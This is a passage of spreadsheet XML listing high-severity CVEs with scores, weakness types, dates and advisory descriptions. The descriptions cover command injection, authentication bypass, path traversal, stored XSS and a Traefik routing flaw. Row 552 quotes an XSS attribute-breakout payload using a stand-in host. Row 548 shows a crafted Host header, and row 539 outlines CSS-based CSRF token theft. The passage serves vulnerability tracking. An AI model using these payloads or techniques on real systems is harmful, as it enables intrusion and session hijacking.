          <t>SadTalker contains an OS command injection vulnerability in the video muxing process where uploaded audio filenames are interpolated into ffmpeg commands without proper escaping. Attackers can upload audio files with shell metacharacters in the filename to break out of quoted arguments and execute arbitrary system commands when video generation occurs.</t>
        </is>
      </c>
      <c r="M532" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85696</t>
        </is>
      </c>
    </row>
    <row r="533">
      <c r="A533" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B533" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86121</t>
        </is>
      </c>
      <c r="C533" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D533" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E533" s="5" t="inlineStr"/>
      <c r="F533" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G533" s="5" t="inlineStr"/>
      <c r="H533" s="5" t="inlineStr"/>
      <c r="I533" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J533" s="5" t="inlineStr"/>
      <c r="K533" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L533" s="5" t="inlineStr">
        <is>
          <t>Cua computer-server versions before 0.3.42 skip authentication when the CONTAINER_NAME environment variable is unset and bind to all interfaces by default, allowing unauthenticated attackers to execute arbitrary commands. Attackers can reach TCP port 8000 to run shell commands via the run_command endpoint, read and write arbitrary files through file operation endpoints, and access interactive PTY shells without authentication.</t>
        </is>
      </c>
      <c r="M533" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86121</t>
        </is>
      </c>
    </row>
    <row r="534">
      <c r="A534" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B534" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86184</t>
        </is>
      </c>
      <c r="C534" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D534" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E534" s="5" t="inlineStr"/>
      <c r="F534" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G534" s="5" t="inlineStr"/>
      <c r="H534" s="5" t="inlineStr"/>
      <c r="I534" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J534" s="5" t="inlineStr"/>
      <c r="K534" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L534" s="5" t="inlineStr">
        <is>
          <t>Lara Dashboard before 1.3.0 contains an authentication bypass vulnerability in the screenshot-login route that allows unauthenticated attackers to authenticate as any user by email when APP_ENV is not production. Attackers can request the GET /screenshot-login/{email} endpoint with a registered email address to receive a fully authenticated session, enabling access to user administration, settings, database contents, and arbitrary code execution through the module installer.</t>
        </is>
      </c>
      <c r="M534" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86184</t>
        </is>
      </c>
    </row>
    <row r="535">
      <c r="A535" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B535" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86189</t>
        </is>
      </c>
      <c r="C535" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D535" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E535" s="5" t="inlineStr"/>
      <c r="F535" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G535" s="5" t="inlineStr"/>
      <c r="H535" s="5" t="inlineStr"/>
      <c r="I535" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J535" s="5" t="inlineStr"/>
      <c r="K535" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="L535" s="5" t="inlineStr">
        <is>
          <t>WWBN AVideo contains a path traversal vulnerability in notify.ffmpeg.json.php that allows unauthenticated attackers to write files to arbitrary locations by supplying a caller-chosen path in the avideoRelativePath parameter. Attackers can replay any previously issued ciphertext as a notifyCode token, which is decrypted but never validated, to bypass authentication and write files to the application root and subdirectories.</t>
        </is>
      </c>
      <c r="M535" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86189</t>
        </is>
      </c>
    </row>
    <row r="536">
      <c r="A536" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B536" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86190</t>
        </is>
      </c>
      <c r="C536" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D536" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E536" s="5" t="inlineStr"/>
      <c r="F536" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G536" s="5" t="inlineStr"/>
      <c r="H536" s="5" t="inlineStr"/>
      <c r="I536" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J536" s="5" t="inlineStr"/>
      <c r="K536" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L536" s="5" t="inlineStr">
        <is>
          <t>WWBN AVideo contains a broken access control vulnerability in videoViewsInfo endpoints that returns complete user records including password hashes, recovery tokens, and live session identifiers to unauthenticated callers when a hash parameter is provided. Attackers can use the disclosed session identifier to hijack viewer sessions, including administrator accounts, and obtain sensitive personal data for all video viewers.</t>
        </is>
      </c>
      <c r="M536" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86190</t>
        </is>
      </c>
    </row>
    <row r="537">
      <c r="A537" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B537" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86296</t>
        </is>
      </c>
      <c r="C537" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D537" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E537" s="5" t="inlineStr"/>
      <c r="F537" s="5" t="n">
        <v>0.013</v>
      </c>
      <c r="G537" s="5" t="inlineStr"/>
      <c r="H537" s="5" t="inlineStr"/>
      <c r="I537" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J537" s="5" t="inlineStr"/>
      <c r="K537" s="5" t="inlineStr">
        <is>
          <t>CWE-119, CWE-121</t>
        </is>
      </c>
      <c r="L537" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was determined in D-Link DIR-822A A_101. This vulnerability affects the function strcpy of the file udhcpcd/serverpacket.c of the component udhcpcd. This manipulation causes stack-based buffer overflow. The attack is possible to be carried out remotely. The exploit has been publicly disclosed and may be utilized.</t>
        </is>
      </c>
      <c r="M537" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86296</t>
        </is>
      </c>
    </row>
    <row r="538">
      <c r="A538" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B538" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86543</t>
        </is>
      </c>
      <c r="C538" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D538" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E538" s="5" t="inlineStr"/>
      <c r="F538" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G538" s="5" t="inlineStr"/>
      <c r="H538" s="5" t="inlineStr"/>
      <c r="I538" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J538" s="5" t="inlineStr"/>
      <c r="K538" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L538" s="5" t="inlineStr">
        <is>
          <t>knowns versions before 0.30.0 serve the management API without authentication on all network interfaces by default, with no password required on fresh installations. Attackers can access the unauthenticated /api/tunnel/start endpoint to provision a public tunnel and republish the API at a publicly accessible address.</t>
        </is>
      </c>
      <c r="M538" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86543</t>
        </is>
      </c>
    </row>
    <row r="539">
      <c r="A539" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B539" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86738</t>
        </is>
      </c>
      <c r="C539" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D539" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E539" s="5" t="inlineStr"/>
      <c r="F539" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G539" s="5" t="inlineStr"/>
      <c r="H539" s="5" t="inlineStr">
        <is>
          <t>snipeitapp:snipe-it</t>
        </is>
      </c>
      <c r="I539" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J539" s="5" t="inlineStr"/>
      <c r="K539" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L539" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT versions before 8.7.0 contain a CSS injection vulnerability in the Custom CSS field due to incomplete sanitization that reverses HTML encoding on greater-than and double-quote characters. Superusers can plant malicious CSS payloads using @import and url() references to exfiltrate CSRF tokens from other superusers via attribute-selector rules, enabling account takeover.</t>
        </is>
      </c>
      <c r="M539" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86738</t>
        </is>
      </c>
    </row>
    <row r="540">
      <c r="A540" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B540" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87929</t>
        </is>
      </c>
      <c r="C540" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D540" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E540" s="5" t="inlineStr"/>
      <c r="F540" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G540" s="5" t="inlineStr"/>
      <c r="H540" s="5" t="inlineStr"/>
      <c r="I540" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J540" s="5" t="inlineStr"/>
      <c r="K540" s="5" t="inlineStr">
        <is>
          <t>CWE-321</t>
        </is>
      </c>
      <c r="L540" s="5" t="inlineStr">
        <is>
          <t>MaxSite CMS through 109.6 ships with a hardcoded session encryption key in application/config/config.php that is never changed during installation, allowing unauthenticated attackers to forge administrator session cookies. Attackers can mint a malicious ci_session cookie with administrator privileges by computing an HMAC-SHA1 using the publicly known encryption key, bypassing authentication checks in is_login() and mso_check_allow() functions.</t>
        </is>
      </c>
      <c r="M540" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87929</t>
        </is>
      </c>
    </row>
    <row r="541">
      <c r="A541" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B541" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88069</t>
        </is>
      </c>
      <c r="C541" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D541" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E541" s="5" t="inlineStr"/>
      <c r="F541" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G541" s="5" t="inlineStr"/>
      <c r="H541" s="5" t="inlineStr"/>
      <c r="I541" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J541" s="5" t="inlineStr"/>
      <c r="K541" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L541" s="5" t="inlineStr">
        <is>
          <t>Pandora contains a path traversal vulnerability in its archive extraction worker. When processing a specially crafted archive or disk image, attacker-controlled file paths could be used without ensuring that the resulting destination remained within the intended extraction directory.
An attacker able to submit a malicious file for analysis could use path traversal sequences or crafted paths to cause extracted content to be written outside the designated extraction directory, potentially overwriting files accessible to the Pandora worker process. Successful exploitation could result in unauthorized modification of application or system files, denial of service, and potentially further compromise depending on the permissions of the Pandora process and the files that can be overwritten.
The vulnerability is addressed by resolving each extraction destination path before writing and verifying that it remains below the expected extraction directory. Extraction attempts resolving outside this directory are rejected and reported as path traversal attempts.</t>
        </is>
      </c>
      <c r="M541" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88069</t>
        </is>
      </c>
    </row>
    <row r="542">
      <c r="A542" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B542" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88860</t>
        </is>
      </c>
      <c r="C542" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D542" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E542" s="5" t="inlineStr"/>
      <c r="F542" s="5" t="inlineStr"/>
      <c r="G542" s="5" t="inlineStr"/>
      <c r="H542" s="5" t="inlineStr"/>
      <c r="I542" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J542" s="5" t="inlineStr"/>
      <c r="K542" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L542" s="5" t="inlineStr">
        <is>
          <t>Capgo fails to clean up channel permission overrides when a user's last organization role binding is deleted, leaving stale overrides active. Attackers can retain channel-specific permissions after their base RBAC access has been revoked to perform unauthorized actions like changing production OTA versions.</t>
        </is>
      </c>
      <c r="M542" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88860</t>
        </is>
      </c>
    </row>
    <row r="543">
      <c r="A543" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B543" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88864</t>
        </is>
      </c>
      <c r="C543" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D543" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E543" s="5" t="inlineStr"/>
      <c r="F543" s="5" t="inlineStr"/>
      <c r="G543" s="5" t="inlineStr"/>
      <c r="H543" s="5" t="inlineStr"/>
      <c r="I543" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J543" s="5" t="inlineStr"/>
      <c r="K543" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="L543" s="5" t="inlineStr">
        <is>
          <t>Capgo (capgo.app) fails to restrict direct write access to the public.sso_providers table exposed through Supabase PostgREST. A holder of an ordinary Capgo full API key can insert a row with status='active' and enforce_sso=true, bypassing the intended backend SSO provisioning route (supabase/functions/_backend/private/sso/providers.ts) and its controls: the Enterprise plan requirement, SSO provider creation via the Supabase Management API, DNS TXT domain-ownership verification, the pending_verification → verified → active status transition, and issuance of a trusted provider ID by Supabase Auth. The forged row is trusted by SSO discovery and enforcement logic, including the unauthenticated login preflight endpoint /private/sso/check-domain, which then reports {"has_sso": true, "enforce_sso": true} for domains that were never verified, allowing attacker-controlled SSO enforcement to be asserted for arbitrary domains and disrupting normal login. All versions are affected; at the time of the advisory no patch was available.</t>
        </is>
      </c>
      <c r="M543" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88864</t>
        </is>
      </c>
    </row>
    <row r="544">
      <c r="A544" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B544" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88866</t>
        </is>
      </c>
      <c r="C544" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D544" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E544" s="5" t="inlineStr"/>
      <c r="F544" s="5" t="inlineStr"/>
      <c r="G544" s="5" t="inlineStr"/>
      <c r="H544" s="5" t="inlineStr"/>
      <c r="I544" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J544" s="5" t="inlineStr"/>
      <c r="K544" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L544" s="5" t="inlineStr">
        <is>
          <t>WWBN AVideo through commit c3edcc274c389816d434acadac07ee78eaf330c1 contains a stored cross-site scripting vulnerability in the LoginControl plugin that fails to encode the User-Agent header before storing it in login history. Attackers with any valid login account can inject malicious scripts in the User-Agent header that execute in administrator browsers when viewing the Login History page, allowing script execution within the administrator session.</t>
        </is>
      </c>
      <c r="M544" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88866</t>
        </is>
      </c>
    </row>
    <row r="545">
      <c r="A545" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B545" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88867</t>
        </is>
      </c>
      <c r="C545" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D545" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E545" s="5" t="inlineStr"/>
      <c r="F545" s="5" t="inlineStr"/>
      <c r="G545" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H545" s="5" t="inlineStr"/>
      <c r="I545" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J545" s="5" t="inlineStr"/>
      <c r="K545" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L545" s="5" t="inlineStr">
        <is>
          <t>WWBN AVideo, in versions up to and including commit c3edcc274c389816d434acadac07ee78eaf330c1, contains a stored cross-site scripting vulnerability. objects/categoryAddNew.json.php passes the POST parameters `name` and `iconClass` to Category::setName() and Category::setIconClass(), which store the values without sanitization (setName only truncates to 45 characters). The category name is later echoed as HTML text and iconClass is echoed into a class attribute in view/modeYoutubeBottom.php and in Gallery cards (plugin/Gallery/functions.php). When the CustomizeUser option usersCanCreateNewCategories is enabled, any authenticated user with canUpload permission (granted by default via self-registration) can create a category containing a JavaScript payload; the payload then executes in the browser of any visitor, including administrators, who views a watch page or gallery entry for a video assigned to that category, allowing actions such as authenticated requests with the victim's session. The issue was unpatched at the time of reporting.</t>
        </is>
      </c>
      <c r="M545" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88867</t>
        </is>
      </c>
    </row>
    <row r="546">
      <c r="A546" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B546" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88868</t>
        </is>
      </c>
      <c r="C546" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D546" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E546" s="5" t="inlineStr"/>
      <c r="F546" s="5" t="inlineStr"/>
      <c r="G546" s="5" t="inlineStr"/>
      <c r="H546" s="5" t="inlineStr"/>
      <c r="I546" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J546" s="5" t="inlineStr"/>
      <c r="K546" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L546" s="5" t="inlineStr">
        <is>
          <t>AVideo through commit c3edcc274c389816d434acadac07ee78eaf330c1 contains a stored cross-site scripting vulnerability in the LiveLinks plugin where title and description fields are stored without sanitization. A user with canStream permission can inject malicious scripts that execute in the browser of every visitor viewing the live-link page, including administrators, within the site origin.</t>
        </is>
      </c>
      <c r="M546" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88868</t>
        </is>
      </c>
    </row>
    <row r="547">
      <c r="A547" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B547" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88869</t>
        </is>
      </c>
      <c r="C547" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D547" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E547" s="5" t="inlineStr"/>
      <c r="F547" s="5" t="inlineStr"/>
      <c r="G547" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H547" s="5" t="inlineStr"/>
      <c r="I547" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J547" s="5" t="inlineStr"/>
      <c r="K547" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L547" s="5" t="inlineStr">
        <is>
          <t>AVideo through commit c3edcc274c389816d434acadac07ee78eaf330c1 contains a stored cross-site scripting vulnerability in the AD_Server plugin's log.php endpoint that fails to escape the label parameter before storage. An unauthenticated attacker can inject malicious HTML through the label parameter, which is later rendered unsanitized in the admin Ad Types report using jQuery .html(), allowing execution of arbitrary JavaScript in an administrator's browser session.</t>
        </is>
      </c>
      <c r="M547" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88869</t>
        </is>
      </c>
    </row>
    <row r="548">
      <c r="A548" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B548" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88877</t>
        </is>
      </c>
      <c r="C548" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D548" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E548" s="5" t="inlineStr"/>
      <c r="F548" s="5" t="inlineStr"/>
      <c r="G548" s="5" t="inlineStr">
        <is>
          <t>nginx, kubernetes</t>
        </is>
      </c>
      <c r="H548" s="5" t="inlineStr"/>
      <c r="I548" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J548" s="5" t="inlineStr"/>
      <c r="K548" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L548" s="5" t="inlineStr">
        <is>
          <t>Traefik is a HTTP reverse proxy and load balancer. In versions &gt;= v3.7.0 and &lt;= v3.7.11, the Kubernetes ingress-nginx provider mishandles Ingresses that carry both an authentication annotation and the nginx.ingress.kubernetes.io/from-to-www-redirect annotation. For such Ingresses the provider creates an additional 'sibling' router that matches on the host alone, carries only the RedirectRegex middleware, and still points at the parent router's protected backend service. Because RedirectRegex is not a terminal handler, a request its pattern does not match is forwarded to the backend, and because the redirect pattern only accepts a numeric port while Traefik's host matcher canonicalizes the authority via net.SplitHostPort, a request with a non-numeric or empty port (for example 'Host: www.example.com:x') selects the sibling router, misses the redirect, and is proxied to the protected backend with none of the Ingress's annotation-derived middlewares applied. This discards not only authentication (e.g. BasicAuth) but every annotation-derived middleware, including source-IP allowlisting. Traefik v2 and v3 releases before v3.7.0 are not affected. The issue is fixed in v3.7.12.</t>
        </is>
      </c>
      <c r="M548" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88877</t>
        </is>
      </c>
    </row>
    <row r="549">
      <c r="A549" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B549" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88899</t>
        </is>
      </c>
      <c r="C549" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D549" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E549" s="5" t="inlineStr"/>
      <c r="F549" s="5" t="inlineStr"/>
      <c r="G549" s="5" t="inlineStr"/>
      <c r="H549" s="5" t="inlineStr"/>
      <c r="I549" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J549" s="5" t="inlineStr"/>
      <c r="K549" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="L549" s="5" t="inlineStr">
        <is>
          <t>knowns versions before 0.31.0 fail to properly validate the x-opencode-directory request header in the /api/opencode proxy endpoint. Remote attackers can supply arbitrary directory paths to execute file operations outside the project root on the host system.</t>
        </is>
      </c>
      <c r="M549" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88899</t>
        </is>
      </c>
    </row>
    <row r="550">
      <c r="A550" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B550" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89042</t>
        </is>
      </c>
      <c r="C550" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D550" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E550" s="5" t="inlineStr"/>
      <c r="F550" s="5" t="inlineStr"/>
      <c r="G550" s="5" t="inlineStr"/>
      <c r="H550" s="5" t="inlineStr"/>
      <c r="I550" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J550" s="5" t="inlineStr"/>
      <c r="K550" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="L550" s="5" t="inlineStr">
        <is>
          <t>passport-saml-encrypted through 0.1.13 makes SAML signature verification conditional on an optional cert option, allowing attackers to bypass authentication by submitting unsigned SAML responses. Attackers can post forged SAML responses with arbitrary NameID and attributes to the assertion consumer service endpoint to receive authenticated profiles without valid signatures.</t>
        </is>
      </c>
      <c r="M550" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89042</t>
        </is>
      </c>
    </row>
    <row r="551">
      <c r="A551" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B551" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89249</t>
        </is>
      </c>
      <c r="C551" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D551" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E551" s="5" t="inlineStr"/>
      <c r="F551" s="5" t="inlineStr"/>
      <c r="G551" s="5" t="inlineStr"/>
      <c r="H551" s="5" t="inlineStr"/>
      <c r="I551" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J551" s="5" t="inlineStr"/>
      <c r="K551" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L551" s="5" t="inlineStr">
        <is>
          <t>AVideo through commit c3edcc274c389816d434acadac07ee78eaf330c1 contains a stored cross-site scripting vulnerability in the YPTWallet plugin where user-supplied CryptoWallet values are base64-encoded but not HTML-escaped before storage in wallet_log.information. Administrators viewing pending withdrawal requests in pendingRequests.php execute the stored markup in their session, allowing attackers to perform administrative actions via same-origin fetch requests.</t>
        </is>
      </c>
      <c r="M551" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89249</t>
        </is>
      </c>
    </row>
    <row r="552">
      <c r="A552" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B552" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89253</t>
        </is>
      </c>
      <c r="C552" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D552" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E552" s="5" t="inlineStr"/>
      <c r="F552" s="5" t="inlineStr"/>
      <c r="G552" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H552" s="5" t="inlineStr"/>
      <c r="I552" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J552" s="5" t="inlineStr"/>
      <c r="K552" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L552" s="5" t="inlineStr">
        <is>
          <t>WWBN AVideo through commit c3edcc274c389816d434acadac07ee78eaf330c1 contains a stored cross-site scripting vulnerability in the user 'donationLink' profile field. User::setDonationLink() (objects/user.php) stores the value and save() validates it only with filter_var(..., FILTER_VALIDATE_URL), which accepts strings such as http://evil.example/"onmouseover=alert(document.domain)//, while getDonationLink() applies only strip_tags() and does not encode double quotes. plugin/CustomizeUser/actionButton.php echoes the value unencoded into an &lt;a href="..."&gt; attribute, and that button is included from view/modeYoutubeBottom.php on the watch page when the CustomizeUser option allowDonationLink is enabled. An authenticated user who updates their own profile via objects/userUpdate.json.php can therefore break out of the href attribute and inject an event handler that executes JavaScript in the browser of any visitor—including an administrator—who views the attacker's videos and interacts with (for example, hovers over) the donation button. The issue was unfixed at the time of reporting.</t>
        </is>
      </c>
      <c r="M552" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89253</t>
        </is>
      </c>
    </row>
    <row r="553">
      <c r="A553" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B553" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89254</t>
        </is>
      </c>
      <c r="C553" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D553" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
